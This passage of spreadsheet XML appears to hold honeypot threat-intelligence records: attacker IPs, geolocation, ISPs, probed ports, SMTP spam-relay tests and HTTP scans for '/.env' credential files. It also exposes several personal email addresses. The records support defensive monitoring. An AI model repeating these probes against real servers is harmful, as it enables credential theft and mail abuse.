8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '144.126.148.5_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 16 Feb 2025 11:10:13 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.74.222.213_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Mon, 17 Feb 2025 04:38:18 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Tue, 18 Feb 2025 23:49:10 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '185.74.222.213_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 20 Feb 2025 04:13:45 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;ban-ki-moon2015@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sun, 2 Mar 2025 15:05:06 -0800_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;std63.29282@wisut.ac.th&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;iangudoh@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '154.26.156.60_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Mar 2025 13:56:34 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '45.14.244.111_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 19 Mar 2025 17:12:32 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;overall4life1@yahoo.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;imfstoppingorder@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bettyashley61@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.211.202.140_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Thu, 20 Mar 2025 21:19:34 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.54.117.64', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_HTTP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '95.164.21.98_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 29 Mar 2025 08:48:09 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 29 Mar 2025 09:03:43 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_HTTP:{'Accept': '*/*', 'Accept-Encoding': 'gzip, deflate', 'Connection': 'keep-alive', 'Host': '38.60.209.6', 'User-Agent': 'Mozilla/5.0 (Linux; U; Android 4.4.2; en-US; HM NOTE 1W Build/KOT49H) AppleWebKit/534.30 (KHTML, like Gecko) Version/4.0 UCBrowser/11.0.5.850 U3/0.8.0 Mobile Safari/534.30', 'method': 'GET', 'uri': '/.env'}}&amp;&amp;{Data_SMTP:{'arg': 'FROM:&lt;brianmoynihan@gov.com&gt;', 'command': 'MAIL', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;sandradale47@gmail.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;KristalinaGeorgieva2019@outlook.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'TO:&lt;bernardlauwers91@aol.com&gt;', 'command': 'RCPT', 'data': 'None'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '103.113.68.70_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Sat, 29 Mar 2025 14:20:09 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_RDP:NA}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 2 Apr 2025 09:05:04 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}&amp;&amp;{Data_SMTP:{'arg': 'spameri@tiscali.it_x000d__x000a_Subject:', 'command': 'FROM:', 'data': '109.123.229.33_x000d__x000a_To: spameri@tiscali.it_x000d__x000a_Date: Wed, 2 Apr 2025 09:06:21 -0700_x000d__x000a_X-Priority: 3_x000d__x000a_X-Library: Indy 8.0.25_x000d__x000a__x000d__x000a_t_Smtp.LocalIP'}}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8d62:a2c"/>
    <s v="None&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1257"/>
    <x v="1257"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T10:10:43"/>
    <d v="2025-04-15T19:40:28"/>
    <d v="2025-04-18T10:10:43"/>
    <n v="23"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H30"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="SP"/>
    <s v="São Paulo"/>
    <s v="São José dos Campos"/>
    <s v="São José dos Campos"/>
    <s v="3448636"/>
    <s v="NA"/>
    <s v="-23.1794"/>
    <s v="-45.8869"/>
    <s v="28573"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="Claro NXT Telecomunicacoes Ltda"/>
    <s v="business"/>
    <s v="NET Serviços de Comunicação S.A."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:bb6a:97b9"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1258"/>
    <x v="1258"/>
    <s v="NA&amp;&amp;115-188-87-20-adsl.sparkbb.co.nz"/>
    <x v="0"/>
    <d v="2025-04-18T10:10:40"/>
    <d v="2025-04-15T02:16:36"/>
    <d v="2025-04-18T10:10:40"/>
    <n v="17"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;abuseipdb"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="OC"/>
    <s v="Oceania"/>
    <s v="NZ"/>
    <s v="New Zealand"/>
    <s v="AUK"/>
    <s v="Auckland"/>
    <s v="Auckland"/>
    <s v="Auckland (Auckland CBD)"/>
    <s v="2193733"/>
    <s v="1010"/>
    <s v="-36.8542"/>
    <s v="174.764"/>
    <s v="4771"/>
    <s v="Spark New Zealand Trading Limited"/>
    <s v="Spark New Zealand Trading Ltd"/>
    <s v="residential"/>
    <s v="BBA-SPARK"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:73bc:5714"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1259"/>
    <x v="1259"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T10:04:24"/>
    <d v="2025-04-09T18:45:14"/>
    <d v="2025-04-18T10:04:24"/>
    <n v="2"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H15"/>
    <s v="23"/>
    <s v="True"/>
    <s v="{'korea.services.net': ['unknown']}"/>
    <n v="35"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="KR"/>
    <s v="South Korea"/>
    <s v="41"/>
    <s v="Gyeonggi-do"/>
    <s v="Seongnam-si"/>
    <s v="Seongnam-si (Buljeong-ro)"/>
    <s v="1897000"/>
    <s v="13606"/>
    <s v="37.3654"/>
    <s v="127.122"/>
    <s v="4766"/>
    <s v="Korea Telecom"/>
    <s v="Korea Telecom"/>
    <s v="business"/>
    <s v="Kornet"/>
    <s v="1999-05-25"/>
    <s v="KORNET"/>
    <s v="None"/>
    <s v="connection"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:d2de:fe77"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1260"/>
    <x v="1260"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T09:25:13"/>
    <d v="2025-01-20T12:43:08"/>
    <d v="2025-04-18T09:25:13"/>
    <n v="29"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H13"/>
    <s v="1433&amp;&amp;3306&amp;&amp;25481&amp;&amp;25474"/>
    <s v="True"/>
    <s v="{'z.mailspike.net': ['unknown']}"/>
    <n v="32"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="AP"/>
    <s v="Andhra Pradesh"/>
    <s v="NTR"/>
    <s v="Vijayawada"/>
    <s v="1253184"/>
    <s v="520001"/>
    <s v="16.5062"/>
    <s v="80.648"/>
    <s v="24309"/>
    <s v="Atria Convergence Technologies Pvt. Ltd.,"/>
    <s v="Atria Convergence Technologies Ltd."/>
    <s v="residential"/>
    <s v="Beam Telecom Pvt Ltd"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="login&amp;&amp;connection&amp;&amp;NA"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:31cc:4065"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1261"/>
    <x v="1261"/>
    <s v="NA&amp;&amp;138-36-83-21.netfar.com.br"/>
    <x v="0"/>
    <d v="2025-04-18T08:43:32"/>
    <d v="2025-04-16T13:57:58"/>
    <d v="2025-04-18T08:43:32"/>
    <n v="5"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H17"/>
    <s v="23"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="SA"/>
    <s v="South America"/>
    <s v="BR"/>
    <s v="Brazil"/>
    <s v="RS"/>
    <s v="Rio Grande do Sul"/>
    <s v="Bento Gonçalves"/>
    <s v="Bento Gonçalves"/>
    <s v="3470073"/>
    <s v="NA"/>
    <s v="-29.1714"/>
    <s v="-51.5192"/>
    <s v="264571"/>
    <s v="Netfar Informatica Ltda"/>
    <s v="Netfar Informatica Ltda"/>
    <s v="business"/>
    <s v="Netfar Informatica Ltda"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="None"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:8a24:5315"/>
    <s v="C-I_D"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1262"/>
    <x v="1262"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T08:34:41"/>
    <d v="2023-12-03T07:11:00"/>
    <d v="2025-04-18T08:34:41"/>
    <n v="156"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Incomming Traffic&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MT-CPA_H27&amp;&amp;SMA-LAB_MYSQL_H13&amp;&amp;SMA-LAB_MYSQL_HC1"/>
    <s v="1433&amp;&amp;59201&amp;&amp;3306"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="VN"/>
    <s v="Vietnam"/>
    <s v="HN"/>
    <s v="Hanoi"/>
    <s v="NA"/>
    <s v="Hanoi"/>
    <s v="1581130"/>
    <s v="NA"/>
    <s v="21.0278"/>
    <s v="105.834"/>
    <s v="45899"/>
    <s v="VNPT Corp"/>
    <s v="VNPT"/>
    <s v="business"/>
    <s v="Vietnam Posts and Telecommunications Group"/>
    <s v="2010-08-16"/>
    <s v="VNPT-VN"/>
    <s v="None"/>
    <s v="login&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_MSSQl:NA}&amp;&amp;{Data_MYSQL:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:ee0:b0ee"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1263"/>
    <x v="1263"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T08:11:05"/>
    <d v="2025-04-15T16:48:15"/>
    <d v="2025-04-18T08:11:05"/>
    <n v="9"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H32"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="MO"/>
    <s v="Macao"/>
    <s v="NA"/>
    <s v="Nossa Senhora do Carmo"/>
    <s v="NA"/>
    <s v="Taipa"/>
    <s v="1821263"/>
    <s v="999078"/>
    <s v="22.16"/>
    <s v="113.556"/>
    <s v="4609"/>
    <s v="Companhia de Telecomunicacoes de Macau"/>
    <s v="Companhia de Telecomunicacoes de Macau SARL"/>
    <s v="business"/>
    <s v="NetRail"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
    <s v="{Data_TELNET:NA}&amp;&amp;NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:cdd7:1ce0"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1264"/>
    <x v="1264"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T08:10:36"/>
    <d v="2024-03-16T10:35:09"/>
    <d v="2025-04-18T08:10:36"/>
    <n v="168"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web'&amp;&amp; 'attack-target:mail']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_MT-CPA_H1&amp;&amp;SMA-LAB_TELNET_H24&amp;&amp;SMA-LAB_TELNET_H9&amp;&amp;SMA-LAB_TELNET_H33&amp;&amp;SMA-LAB_TELNET_H45&amp;&amp;SMA-LAB_TELNET_H7&amp;&amp;SMA-LAB_TELNET_H36&amp;&amp;SMA-LAB_TELNET_HC1&amp;&amp;SMA-LAB_TELNET_H27&amp;&amp;SMA-LAB_TELNET_H23"/>
    <s v="7237&amp;&amp;23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="MH"/>
    <s v="Maharashtra"/>
    <s v="Raigad"/>
    <s v="Uran"/>
    <s v="1253702"/>
    <s v="NA"/>
    <s v="18.8781"/>
    <s v="72.9392"/>
    <s v="17488"/>
    <s v="HATHWAY CABLE AND DATACOM LIMITED"/>
    <s v="Hathway IP over Cable Internet Access"/>
    <s v="residential"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA&amp;&amp;login"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:7448:69ea"/>
    <s v="None&amp;&amp;C-I&amp;&amp;C-I_D"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1265"/>
    <x v="1265"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T07:54:54"/>
    <d v="2025-04-02T18:22:12"/>
    <d v="2025-04-18T07:54:54"/>
    <n v="7"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_MSSQL_HC1&amp;&amp;SMA-LAB_MSSQL_H18"/>
    <s v="1433"/>
    <s v="True"/>
    <s v="{'b.barracudacentral.org': ['unknown']&amp;&amp; 'zen.spamhaus.org': ['unknown']}"/>
    <n v="73"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="IN"/>
    <s v="India"/>
    <s v="KL"/>
    <s v="Kerala"/>
    <s v="Trivandrum"/>
    <s v="Thiruvananthapuram (Technopark Campus)"/>
    <s v="1254163"/>
    <s v="695034"/>
    <s v="8.5581"/>
    <s v="76.8816"/>
    <s v="17465"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="residential"/>
    <s v="Asianet Satellite Communications Pvt Ltd"/>
    <s v="2009-06-23"/>
    <s v="ASIANET"/>
    <s v="None"/>
    <s v="connection&amp;&amp;login"/>
    <s v="{Data_MSSQl:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:6f5c:6b05"/>
    <s v="C-I"/>
    <s v="low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1266"/>
    <x v="1266"/>
    <s v="NA"/>
    <x v="0"/>
    <d v="2025-04-18T07:44:53"/>
    <d v="2023-12-17T19:17:16"/>
    <d v="2025-04-18T07:44:53"/>
    <n v="11258"/>
    <s v="SQTK_GTDN"/>
    <s v="['attack-source'&amp;&amp; 'attack-target:web']&amp;&amp;Anonymous Behaviour Observed&amp;&amp;Untrusted Traffic"/>
    <s v="low"/>
    <s v="SMA-LAB_DNS_H19&amp;&amp;SMA-LAB_MT-CPA_H20&amp;&amp;SMA-LAB_DHCP_H20&amp;&amp;SMA-LAB_HTTP_H21&amp;&amp;SMA-LAB_SSH_H42&amp;&amp;SMA-LAB_SSH_H35&amp;&amp;SMA-LAB_MT-CPA_H29&amp;&amp;SMA-LAB_MT-CPA_H35&amp;&amp;SMA-LAB_MT-CPA_H41&amp;&amp;SMA-LAB_MT-CPA_H47&amp;&amp;SMA-LAB_HTTPS_H21&amp;&amp;SMA-LAB_IRC_HC1&amp;&amp;SMA-LAB_MT-CPA_H12&amp;&amp;SMA-LAB_MT-CPA_H8"/>
    <s v="53&amp;&amp;137&amp;&amp;67&amp;&amp;80&amp;&amp;22&amp;&amp;22&amp;&amp;50868&amp;&amp;51977&amp;&amp;53647&amp;&amp;56109&amp;&amp;443&amp;&amp;6667&amp;&amp;53029&amp;&amp;57252&amp;&amp;56072&amp;&amp;23"/>
    <s v="True"/>
    <s v="{'all.s5h.net': ['unknown']&amp;&amp; 'dnsbl-2.uceprotect.net': ['unknown']}"/>
    <n v="68"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="NA"/>
    <s v="North America"/>
    <s v="US"/>
    <s v="United States"/>
    <s v="CA"/>
    <s v="California"/>
    <s v="Santa Clara"/>
    <s v="Santa Clara"/>
    <s v="5393015"/>
    <s v="95054"/>
    <s v="37.3833"/>
    <s v="-121.983"/>
    <s v="396982"/>
    <s v="Google LLC"/>
    <s v="Google LLC"/>
    <s v="hosting"/>
    <s v="Palo Alto Networks, Inc"/>
    <s v="2023-09-07"/>
    <s v="PAN-22"/>
    <s v="2023-09-07"/>
    <s v="NA&amp;&amp;connection"/>
    <s v="NA&amp;&amp;{Data_TELNET:NA}"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <x v="0"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="::ffff:93b9:84c5"/>
    <s v="None&amp;&amp;C-I"/>
    <s v="high&amp;&amp;low"/>
    <s v="Low"/>
    <m/>
    <m/>
  </r>
  <r>
    <x v="1267"/>
    <x v="1267"/>
    <s v="NA&amp;&amp;114-25-149-250.dynamic-ip.hinet.net"/>
    <x v="0"/>
    <d v="2025-04-18T07:10:19"/>
    <d v="2025-04-16T06:54:38"/>
    <d v="2025-04-18T07:10:19"/>
    <n v="6"/>
    <s v="SQTK_GTDN"/>
    <s v="Untrusted Traffic&amp;&amp;Anonymous Behaviour Observed"/>
    <s v="high"/>
    <s v="SMA-LAB_TELNET_H4&amp;&amp;SMA-LAB_TELNET_HC1"/>
    <s v="23&amp;&amp;NA"/>
    <s v="False"/>
    <s v="NA"/>
    <n v="0"/>
    <s v="False"/>
    <s v="False"/>
    <s v="NA"/>
    <s v="low"/>
    <s v="Untrusted Traffic"/>
    <s v="AS"/>
    <s v="Asia"/>
    <s v="TW"/>
    <s v="Taiwan"/>
    <s v="NA"/>
    <s v="Taiwan"/>
    <s v="Taipei City"/>
    <s v="Neihu District"/>
    <s v="1671467"/>
    <s v="NA"/>
    <s v="25.0689"/>
    <s v="121.591"/>
    <s v="3462"/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="Chunghwa Telecom Co., Ltd."/>
    <s v="business"/>
    <s v="Chunghwa Telecom Co. Ltd."/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="NA"/>
    <s v="connection&amp;&amp;NA"/>
